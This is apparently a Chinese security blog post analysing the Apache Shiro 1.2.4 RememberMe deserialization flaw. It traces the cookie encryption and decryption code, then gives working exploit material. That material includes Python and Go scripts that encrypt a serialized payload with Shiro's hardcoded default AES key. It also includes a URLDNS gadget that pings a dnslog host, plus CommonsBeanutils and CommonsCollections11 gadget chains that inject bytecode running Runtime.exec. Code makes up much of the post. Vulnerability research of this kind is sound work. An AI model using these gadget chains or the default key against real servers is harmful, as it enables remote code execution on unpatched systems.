基本概述
Apache Shiro是一个开源的Java安全框架,用于身份验证、授权和加密。它提供了一个简单而强大的API,使开发人员能够轻松地实现安全功能。
Apache Shiro的主要功能包括:
- 身份验证:提供了用户身份验证的功能,包括基于用户名和密码的验证、基于令牌的验证(如JWT)以及自定义的验证方式。
- 授权:提供了对用户进行授权的功能,可以根据用户的角色、权限等进行访问控制。
- 会话管理:可以管理用户的会话,包括会话的创建、销毁、读写等操作。
- 密码加密:提供了密码加密和解密的功能,帮助开发人员保护用户密码的安全。
- Web集成:提供了与Web应用程序的集成支持,可以轻松地将Shiro与常见的Web框架(如Spring MVC)集成在一起。
Apache Shiro框架提供了RememberMe记住我的功能,用户登陆成功后会生成经过加密并编码的Cookie,在服务端接收cookie值后进行Base64解码–>AES解密–>反序列化。
攻击者只要找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化–>AES加密–>Base64编码,然后将其作为Cookie的RememberMe字段发送,Shiro将RememberMe进行解密并且反序列化,最终造成反序列化漏洞。
调试分析环境
Apache Shiro下载地址:https://github.com/apache/shiro/releases/tag/shiro-root-1.2.4
Apache Shiro <= 1.2.4
JDK8u65
Apache Tomcat9.0.65
漏洞原理分析
加密分析
当我们输入账号密码登录后,如果登录成功,则会进入 AbstractRememberMeManager.onSuccessfulLogin
方法,该方法有三个参数,分别是 Subject
、AuthenticationToken
和 AuthenticationInfo
Subject
表示当前用户的身份,可以通过SecurityUtils.getSubject()
方法获得。Subject
是进行身份验证和授权操作的主体对象。通过Subject
,可以执行身份验证、授权和会话管理等操作。AuthenticationToken
是一个包含用户身份凭证的对象,用于表示用户提交的身份验证信息。在身份验证过程中,应用程序通常会将用户提供的用户名和密码封装到AuthenticationToken
对象中。AuthenticationToken
的实现通常由应用程序根据实际情况提供。AuthenticationInfo
表示用户的身份验证信息,包括身份凭证(如用户名、密码)和相关的认证数据(如角色、权限等)。AuthenticationInfo
对象用于在身份验证过程中验证用户提供的凭证是否正确,并提供用户的身份信息给Shiro使用。
如果在登录时,勾选了记住我的选项,那么在token中 rememberme
值就为true
这里会调用到 getIdentityToRemember
方法
这个方法的主要作用就是用于获取记住身份的标识
在 rememberIdentity
方法里面就是对记住用户身份功能进行一个实现了
convertPrincipalsToBytes
方法对记住身份的标识转成字节数组
在这个方法里面其实就是将身份标识进行序列化成字节数组,然后判断了 CipherService
对象不为null的话就调用 encrypt
方法对序列化后的字节数组进行加密再返回
getCipherService
方法里面返回了 cipherService
对象,该对象就是一个AES加密服务对象,可以看到加密模式为CBC
在 encrypt
方法中调用了AES加密服务对象对其加密
getEncryptionCipherKey
方法就是获取了加密的key,这个key是在 AbstractRememberMeManager
类的构造方法中进行设置的
后面就是调用了 cipherService.encrypt
方法将key和身份标识进行了AES加密,返回了使用key进行AES加密的字节数组
在 CookieRememberMeManager
类 rememberSerializedIdentity
方法中前半部分判断了是不是HTTP请求的,然后使用 WebUtils
类获取了 request
和 response
对象,将使用key加密身份标识后的字节数组进行Base64编码
后面就不过多介绍了,就是设置Cookie了,这就是Shiro从登录成功到设置Cookie的加密身份标识的过程
解密分析
解密分析当然也是在 CookieRememberMeManager
类中,getRememberedSerializedIdentity
方法用于读取Cookie,这里要注意的是在Cookie中不能带有 deleteMe
,ensurePadding
方法用来填充我们传入的Base64编码的Cookie,确保数据长度符合加密算法的要求,再往后就是对我们传入的Cookie进行Base64解码成字节数组了
返回了这个解码后的字节数组,我们看下是在哪里调用了这个方法
发现在 AbstractRememberMeManager
类的 getRememberedPrincipals
方法中调用了 getRememberedSerializedIdentity
这个方法
后面调用了 convertBytesToPrincipals
方法将AES加密的字节数组转成 Principal
对象
在该方法中调用了 decrypt
解密方法
这里就和加密分析那边反过来,这里是调用了 cipherService
类的 decrypt
方法来进行解密,然后返回了解密后的序列化字节数组
将解密后的字节数组作为参数调用了 deserialize
方法
deserialize
方法中使用了默认序列化器进行了反序列化,如果我们将恶意的类进行序列化生成 ser.bin
文件,将序列化的文件内容使用Shiro默认key进行加密,再经过Base64编码即可执行恶意代码
漏洞利用脚本
根据上面的分析,写出以下两种语言的读取序列化文件内容进行AES加密再Base64编码脚本
Python
import base64
from turtle import mode
import uuid
from Crypto.Cipher import AES
def get_file_data(filename):
with open(filename, 'rb') as f:
data = f.read()
return data
def aes_enc(data):
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "kPH+bIxk5D2deZiIxcaaaA=="
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
ciphertext = base64.b64encode(iv + encryptor.encrypt(pad(data)))
return ciphertext
def aes_dec(enc_data):
enc_data = base64.b64decode(enc_data)
unpad = lambda s: s[:-s[-1]]
key = "kPH+bIxk5D2deZiIxcaaaA=="
mode = AES.MODE_CBC
iv = enc_data[:16]
encryptor = AES.new(base64.b64decode(key), mode, iv)
plaintext = encryptor.decrypt(enc_data[16:])
plaintext = unpad(plaintext)
return plaintext
if __name__ == "__main__":
data = get_file_data("ser.bin")
print(aes_enc(data))
Go
package main
import (
"fmt"
"os"
)
func main() {
key := "kPH+bIxk5D2deZiIxcaaaA=="
file, err := os.ReadFile("./ser.bin")
if err != nil {
panic(err)
}
encrypt, err := Encrypt(key, file)
if err != nil {
fmt.Println(err)
return
}
fmt.Println(string(encrypt))
//decrypt, err := Decrypt(key, string(encrypt))
//if err != nil {
// fmt.Println(err)
// return
//}
//fmt.Println(string(decrypt))
}
package main
import (
"crypto/aes"
"crypto/cipher"
"crypto/rand"
"encoding/base64"
"errors"
"io"
)
func Encrypt(key string, src []byte) (data []byte, err error) {
decodeKey, err := base64.StdEncoding.DecodeString(key)
if err != nil {
panic(err)
}
block, err := aes.NewCipher(decodeKey)
if err != nil {
return nil, err
} else if len(src) == 0 {
return nil, errors.New("src is empty")
}
plaintext, err := pkcs7Pad(src, block.BlockSize())
if err != nil {
return nil, err
}
ciphertext := make([]byte, aes.BlockSize+len(plaintext))
iv := ciphertext[:aes.BlockSize]
if _, err := io.ReadFull(rand.Reader, iv); err != nil {
return nil, err
}
bm := cipher.NewCBCEncrypter(block, iv)
bm.CryptBlocks(ciphertext[aes.BlockSize:], plaintext)
ciphertext = []byte(base64.StdEncoding.EncodeToString(ciphertext))
return ciphertext, nil
}
func Decrypt(key, src string) (data []byte, err error) {
decodeKey, err := base64.StdEncoding.DecodeString(key)
if err != nil {
panic(err)
}
decodeSrc, err := base64.StdEncoding.DecodeString(src)
if err != nil {
panic(err)
}
if len(src) < aes.BlockSize {
return nil, errors.New("data length error")
}
iv := decodeSrc[:aes.BlockSize]
ciphertext := decodeSrc[aes.BlockSize:]
if len(ciphertext)%aes.BlockSize != 0 {
return nil, errors.New("ciphertext is not a multiple of the block size")
}
block, err := aes.NewCipher(decodeKey)
if err != nil {
return nil, err
}
bm := cipher.NewCBCDecrypter(block, iv)
bm.CryptBlocks(ciphertext, ciphertext)
ciphertext, err = pkcs7Unpad(ciphertext, aes.BlockSize)
if err != nil {
return nil, err
}
return ciphertext, nil
}
package main
import (
"bytes"
"errors"
)
func pkcs7Pad(src []byte, blockSize int) (dest []byte, err error) {
if blockSize <= 0 {
return nil, errors.New("block size is 0")
} else if src == nil || len(src) == 0 {
return nil, errors.New("src is nil")
}
n := blockSize - (len(src) % blockSize)
pb := make([]byte, len(src)+n)
copy(pb, src)
copy(pb[len(src):], bytes.Repeat([]byte{byte(n)}, n))
return pb, nil
}
func pkcs7Unpad(src []byte, blockSize int) (dest []byte, err error) {
if blockSize <= 0 {
return nil, errors.New("block size is 0")
} else if len(src)%blockSize != 0 {
return nil, errors.New("src length error")
} else if src == nil || len(src) == 0 {
return nil, errors.New("src is nil")
}
c := src[len(src)-1]
padLength := int(c)
if padLength == 0 || padLength > len(src) {
return nil, errors.New("pad length error")
}
for i := 0; i < padLength; i++ {
if src[len(src)-padLength+i] != c {
return nil, errors.New("pad content error")
}
}
return src[:len(src)-padLength], nil
}
利用链EXP编写
存在的问题
- Commons-Beanutils库服务端和生成恶意序列化字节码使用的版本一致
如果使用不同的版本,serialVersionUID
可能会不一样,导致无法反序列化
org.apache.commons.collections.comparators.ComparableComparator
依赖Commons-Collections环境
由于 org.apache.commons.collections.comparators.ComparableComparator
类使用了Commons-Collections
URLDNS
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;
public class URLDNS implements Serializable {
public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
HashMap<URL,Integer> hashmap= new HashMap<URL,Integer>();
URL url = new URL("http://shiro.f32v.dnslog.ink/");
Class c = url.getClass();
Field hashcodefile = c.getDeclaredField("hashCode");
hashcodefile.setAccessible(true);
hashcodefile.set(url,1234);
hashmap.put(url,1);
hashcodefile.set(url,-1);
serialize(hashmap,"ser.bin");
}
public static void serialize(Object obj, String obj_file) throws IOException {
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(obj_file));
objectOutputStream.writeObject(obj);
objectOutputStream.close();
}
}
URLDNS链常用来探测漏洞是否存在,该链不需要任何依赖
不依赖Commons-Collections
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xml.internal.security.c14n.helper.AttrCompare;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;
import java.io.*;
import java.lang.reflect.Field;
import java.util.PriorityQueue;
public class CommonsBeanutils183_Shiro {
public static void main(String[] args) throws Exception{
ClassPool classPool = ClassPool.getDefault();
classPool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
CtClass ctClass = classPool.makeClass("EvilCode");
ctClass.makeClassInitializer().insertBefore("java.lang.Runtime.getRuntime().exec(\"open /System/Applications/Calculator.app\");");
ctClass.setName("EvilCode" + System.nanoTime());
ctClass.setSuperclass(classPool.get(AbstractTranslet.class.getName()));
byte[] bytecode = ctClass.toBytecode();
byte[][] bytecodes = new byte[][]{bytecode};
TemplatesImpl templates = TemplatesImpl.class.newInstance();
Class templateImplClass = templates.getClass();
Field nameField = templateImplClass.getDeclaredField("_name");
nameField.setAccessible(true);
nameField.set(templates,"x");
Field bytecodesField = templateImplClass.getDeclaredField("_bytecodes");
bytecodesField.setAccessible(true);
bytecodesField.set(templates,bytecodes);
Field tfactoryField = templateImplClass.getDeclaredField("_tfactory");
tfactoryField.setAccessible(true);
tfactoryField.set(templates,new TransformerFactoryImpl());
BeanComparator beanComparator = new BeanComparator();
PriorityQueue<Object> queue = new PriorityQueue<Object>(beanComparator);
queue.add(1);
queue.add(1);
Class priorityQueueClass = queue.getClass();
Field queueField = priorityQueueClass.getDeclaredField("queue");
queueField.setAccessible(true);
queueField.set(queue,new Object[]{templates, templates});
Class beanComparatorClass = beanComparator.getClass();
Field propertyField = beanComparatorClass.getDeclaredField("property");
propertyField.setAccessible(true);
propertyField.set(beanComparator,"outputProperties");
Field comparatorField = beanComparatorClass.getDeclaredField("comparator");
comparatorField.setAccessible(true);
comparatorField.set(beanComparator,new AttrCompare());
serialize(queue);
//unserialize("ser.bin");
}
public static void serialize(Object obj) throws IOException {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
oos.writeObject(obj);
}
public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
Object obj = ois.readObject();
return obj;
}
}
依赖Commons-Collections
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.functors.InvokerTransformer;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;
public class CommonsCollections11 {
public static void main(String[] args) throws Exception {
ClassPool classPool = ClassPool.getDefault();
classPool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
CtClass ctClass = classPool.makeClass("EvilCode");
ctClass.makeClassInitializer().insertBefore("java.lang.Runtime.getRuntime().exec(\"open /System/Applications/Calculator.app\");");
ctClass.setName("EvilCode" + System.nanoTime());
ctClass.setSuperclass(classPool.get(AbstractTranslet.class.getName()));
byte[] bytecode = ctClass.toBytecode();
byte[][] bytecodes = new byte[][]{bytecode};
TemplatesImpl templates = TemplatesImpl.class.newInstance();
Class templateImplClass = templates.getClass();
Field nameField = templateImplClass.getDeclaredField("_name");
nameField.setAccessible(true);
nameField.set(templates,"x");
Field bytecodesField = templateImplClass.getDeclaredField("_bytecodes");
bytecodesField.setAccessible(true);
bytecodesField.set(templates,bytecodes);
Field tfactoryField = templateImplClass.getDeclaredField("_tfactory");
tfactoryField.setAccessible(true);
tfactoryField.set(templates,new TransformerFactoryImpl());
InvokerTransformer transformer = new InvokerTransformer("aaa", new Class[]{}, new Object[]{});
HashMap innermap = new HashMap();
LazyMap lazyMap = (LazyMap) LazyMap.decorate(innermap,transformer);
TiedMapEntry tiedmap = new TiedMapEntry(lazyMap,templates);
HashSet hashset = new HashSet(1);
hashset.add("a");
// 为了兼容JDK8以下版本
Field mapField;
try{
mapField = HashSet.class.getDeclaredField("map");
}catch(NoSuchFieldException e){
mapField = HashSet.class.getDeclaredField("backingMap");
}
mapField.setAccessible(true);
HashMap hashset_Map = (HashMap) mapField.get(hashset);
Field tableField;
try{
tableField = HashMap.class.getDeclaredField("table");
}catch (NoSuchFieldException e){
tableField = HashMap.class.getDeclaredField("elementData");
}
tableField.setAccessible(true);
Object[] array = (Object[]) tableField.get(hashset_Map);
Object node = array[0];
if (node == null){
node = array[1];
}
Field keyField;
try{
keyField = node.getClass().getDeclaredField("key");
}catch (NoSuchFieldException e){
keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
}
keyField.setAccessible(true);
keyField.set(node,tiedmap);
Field iMethodNameField = transformer.getClass().getDeclaredField("iMethodName");
iMethodNameField.setAccessible(true);
iMethodNameField.set(transformer,"newTransformer");
serialize(hashset);
//deserialize("ser.bin");
}
public static void serialize(Object obj) throws IOException {
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
objectOutputStream.writeObject(obj);
}
public static Object deserialize(String filename) throws IOException, ClassNotFoundException {
ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
return objectInputStream.readObject();
}
}
环境中存在Commons-Collections依赖的话利用链就更多了,这里只使用了CC11的利用链
Author: wileysec
Permalink: https://wileysec.github.io/9ca83d5eef7a.html
Comments